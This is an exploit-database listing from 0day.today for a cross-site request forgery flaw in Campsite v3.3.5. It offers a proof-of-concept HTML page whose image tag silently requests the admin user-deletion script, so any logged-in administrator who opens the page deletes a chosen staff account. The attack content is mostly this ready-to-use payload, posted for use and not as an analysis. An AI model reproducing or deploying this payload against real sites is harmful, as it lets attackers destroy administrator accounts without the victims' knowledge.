[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Campsite v3.3.5 CSRF Vulnerability

Author
Pratul Agrawal
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11239
Category
web applications
Date add
10-03-2010
Platform
unsorted
==================================
Campsite v3.3.5 CSRF Vulnerability
==================================

# Site p4ge     http://wwwcampware.org/
   
  # Plateform     php
   
    
    
  #  Proof of concept   #
  
  Targeted URL:  http://server/admin/login.php
   
  
  Script to delete the Admin user through Cross Site request forgery
   
             .  ..................................................................................................................
   
                        <html>
   
                          <body>
   
                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
   
                          </body>
   
                        </html>
   
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that user having giving ID  get deleted automatically.
  


#  0day.today [2024-12-25]  #